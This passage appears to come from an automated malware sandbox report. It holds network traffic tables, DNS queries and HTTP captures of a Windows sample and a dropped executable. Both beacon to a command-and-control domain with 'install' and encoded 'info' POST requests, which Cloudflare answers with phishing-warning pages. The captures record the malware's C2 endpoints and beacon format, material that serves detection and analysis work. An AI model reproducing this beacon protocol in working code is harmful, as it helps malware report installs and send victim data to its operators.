                                                                                                                                                                Mar 7, 2021 19:21:27.143291950 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:27.143326998 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:27.143460989 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:27.143744946 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:27.143767118 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:27.143883944 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:27.144762039 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:27.370956898 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.347409010 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.347574949 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.395895958 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.401530027 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.401566982 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.401665926 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.401977062 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.402005911 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.402090073 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.403023958 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.558625937 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.563278913 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.563522100 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.612205982 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.615767956 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.615793943 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.615925074 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.616266012 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.616292000 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.616373062 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.617994070 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.667980909 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.757026911 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.808964968 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.808993101 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.809115887 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.809490919 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.809514046 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.810456991 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.810494900 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.871120930 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:31.330152988 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:31.330271959 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:31.379878044 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:31.383521080 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:31.383543015 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:31.383660078 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:31.384035110 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:31.384054899 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:31.384154081 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:31.385025978 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:31.558842897 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:38.158241034 CET4972880192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:38.206682920 CET8049728104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:38.206789017 CET4972880192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:38.209012032 CET4972880192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:38.257576942 CET8049728104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:38.272218943 CET8049728104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:38.272244930 CET8049728104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:38.272260904 CET8049728104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:38.272277117 CET8049728104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:38.272289038 CET8049728104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:38.272330046 CET4972880192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:38.272370100 CET4972880192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:38.272598028 CET4972880192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:38.321568966 CET8049728104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:38.321639061 CET4972880192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:41.877290010 CET4972380192.168.2.5172.67.134.157

                                                                                                                                                                UDP Packets

                                                                                                                                                                Mar 7, 2021 19:21:26.893809080 CET53529298.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:26.966716051 CET6431753192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:27.026211023 CET53643178.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:27.033440113 CET6100453192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:27.084645987 CET53610048.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.205749989 CET5689553192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:28.251885891 CET53568958.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.292393923 CET6237253192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:28.344765902 CET53623728.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.447313070 CET6151553192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:28.493319988 CET53615158.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.500910044 CET5667553192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:28.558232069 CET53566758.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.624905109 CET5717253192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:28.684437037 CET53571728.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.692018032 CET5526753192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:28.751657963 CET53552678.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:31.046312094 CET5096953192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:31.102849007 CET53509698.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:31.269062042 CET6436253192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:31.326342106 CET53643628.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:37.662018061 CET5476653192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:37.708200932 CET53547668.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:37.908792973 CET6144653192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:37.965827942 CET53614468.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:38.079025984 CET5751553192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:38.144830942 CET53575158.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:40.938033104 CET5819953192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:40.986571074 CET53581998.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:49.864664078 CET6522153192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:49.923211098 CET53652218.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:50.647135973 CET6157353192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:50.709374905 CET53615738.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:22:01.804923058 CET5656253192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:22:01.860436916 CET53565628.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:22:33.053370953 CET5359153192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:22:33.099004030 CET53535918.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:22:51.504885912 CET5968853192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:22:51.574675083 CET53596888.8.8.8192.168.2.5

DNS Queries

DNS Answers

                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                • 9a3a97f6f45f2c2b.com

                                                                                                                                                                HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49719 | 104.21.6.78 | 80 | C:\Users\user\Desktop\IpB8f8qwze.exe
Timestamp | kBytes transferred | Direction | Data
Mar 7, 2021 19:21:07.875020027 CET | 617 | OUT | POST //fine/send HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                                Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                upgrade-insecure-requests: 1
                                                                                                                                                                Content-Length: 79
                                                                                                                                                                Host: 9a3a97f6f45f2c2b.com
Mar 7, 2021 19:21:07.875263929 CET | 618 | OUT
                                                                                                                                                                Data Ascii: type=install&seller=user01&price=-0.1&guid=5014FFB57E6DEDA3&ver=51.0&origin=exe
Mar 7, 2021 19:21:07.938493967 CET | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:07 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=dd2f2b376e6c7a2a4259cde814dbcfcb71615141267; expires=Tue, 06-Apr-21 18:21:07 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af8501c60000065a099df000000001
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=5UEXfjplDfVGMPg73FjsPmY8kWp309qcsJnlAv%2BX1MyTCiJhcW5KoEuFL36CQI1A%2FDy4EaGT3CQ6dCM%2Fibs9jl4sFywsyRupA9mFpEuU1Ocyu8iQjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d77c7806065a-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chr
Mar 7, 2021 19:21:07.938528061 CET | 620 | IN
                                                                                                                                                                Data Ascii: ome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,pro
Mar 7, 2021 19:21:07.938553095 CET | 622 | IN
                                                                                                                                                                Data Ascii: > <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquir
Mar 7, 2021 19:21:07.938572884 CET | 623 | IN
                                                                                                                                                                Data Ascii: please contact the Trust &amp; Safety team for more information.</p> </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:tex
Mar 7, 2021 19:21:07.938590050 CET | 623 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0
Mar 7, 2021 19:21:08.161528111 CET | 625 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                                Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                upgrade-insecure-requests: 1
                                                                                                                                                                Content-Length: 81
                                                                                                                                                                Host: 9a3a97f6f45f2c2b.com
Mar 7, 2021 19:21:08.161767960 CET | 625 | OUT
                                                                                                                                                                Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVatWdTuKs232iIBHqPzwSCY~
Mar 7, 2021 19:21:08.215107918 CET | 627 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:08 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=dd545e47b452c86c965fe3fab796d3f111615141268; expires=Tue, 06-Apr-21 18:21:08 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af8502e50000065aff25e000000001
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=uepZQ4jeqLAhyAT5F05SHO6yvipvSo5EMUR92WeMPwh9MjQ6UaHQe5kRJy7U6Q0JFHWACXW%2B%2Bi9qIDopCW%2BpdsUJG50%2BrGFT5FLMa8kK%2FjodJeinnw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d77e3d14065a-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge
Mar 7, 2021 19:21:08.215140104 CET | 628 | IN
                                                                                                                                                                Data Ascii: ,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen
Mar 7, 2021 19:21:08.215157032 CET | 630 | IN
                                                                                                                                                                Data Ascii: r --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to ac
Mar 7, 2021 19:21:08.215173006 CET | 631 | IN
                                                                                                                                                                Data Ascii: hing please contact the Trust &amp; Safety team for more information.</p> </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm
Mar 7, 2021 19:21:08.215186119 CET | 631 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0
Mar 7, 2021 19:21:08.584676027 CET | 632 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                                Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                upgrade-insecure-requests: 1
                                                                                                                                                                Content-Length: 81
                                                                                                                                                                Host: 9a3a97f6f45f2c2b.com
Mar 7, 2021 19:21:08.584753990 CET | 632 | OUT
                                                                                                                                                                Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVfxN5oNu6vlynYL3P6Mok_w~
Mar 7, 2021 19:21:08.636893988 CET | 634 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:08 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=dd545e47b452c86c965fe3fab796d3f111615141268; expires=Tue, 06-Apr-21 18:21:08 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af85048c0000065af2a5f000000001
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ShJlufa9%2Bs2A23rt6QPWuIejAOnZXp28yYe4AGaJcy5AYan9DGRwYcA7erXXel0wVgybpl2eCZXTYZ2nNE6WQLiwhXar4C%2FEdSEB8lFZXPkWoEJAHg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d780ecde065a-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrom
Mar 7, 2021 19:21:08.636929035 CET | 635 | IN
                                                                                                                                                                Data Ascii: e=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,proje
Mar 7, 2021 19:21:08.637360096 CET | 637 | IN
                                                                                                                                                                Data Ascii: <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49722 | 104.21.6.78 | 80 | C:\Users\user\Desktop\IpB8f8qwze.exe
Timestamp | kBytes transferred | Direction | Data
Mar 7, 2021 19:21:13.183574915 CET | 709 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                                Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                upgrade-insecure-requests: 1
                                                                                                                                                                Content-Length: 81
                                                                                                                                                                Host: 9a3a97f6f45f2c2b.com
Mar 7, 2021 19:21:13.183664083 CET | 709 | OUT
                                                                                                                                                                Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVaTMqyRMhson1egjqlolJTk~
Mar 7, 2021 19:21:13.254826069 CET | 711 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:13 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=d5064e1ff96773a428242901dd8ba7c271615141273; expires=Tue, 06-Apr-21 18:21:13 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af8516830000ce578d809000000001
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=LIuNoi4HkIh8nWiQ8fnCIKELOEEQy7R3i%2BcqKjQh5ROuECitvs99l8VCYL3QixERDxjRk9l%2BORgioYwZfVTTnGqaAJmJ9C503mhvZ8Aznl9kYDe4tg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d79d9d89ce57-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrom
Mar 7, 2021 19:21:13.254952908 CET | 712 | IN
                                                                                                                                                                Data Ascii: e=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,proje
Mar 7, 2021 19:21:13.255119085 CET | 713 | IN
                                                                                                                                                                Data Ascii: <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire
Mar 7, 2021 19:21:13.255242109 CET | 715 | IN
                                                                                                                                                                Data Ascii: lease contact the Trust &amp; Safety team for more information.</p> </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-
Mar 7, 2021 19:21:13.255342960 CET | 715 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49723 | 172.67.134.157 | 80 | C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
Timestamp | kBytes transferred | Direction | Data
Mar 7, 2021 19:21:15.779908895 CET | 716 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                upgrade-insecure-requests: 1
                                                                                                                                                                Content-Length: 81
                                                                                                                                                                Host: 9a3a97f6f45f2c2b.com
Mar 7, 2021 19:21:15.779951096 CET | 716 | OUT
                                                                                                                                                                Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVUd2DBPCB7ADDo3WU6UPgg8~
Mar 7, 2021 19:21:15.858582020 CET | 718 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:15 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=d07326ac00a7d961c1ea4899e9e1ac8c31615141275; expires=Tue, 06-Apr-21 18:21:15 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af8520a80000069a65185000000001
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=hRNXaTlH0b8rd2RKqJFuQyb%2BfJ3iKql1CJ35Sh9Zy%2BBtyku9ji2FCMloawaovX3RvIG2KoTodY7SrDkCK8mMgdaX2YhyOqFlW4Vzwn0B3nCbsCxHtg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d7adde29069a-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrom
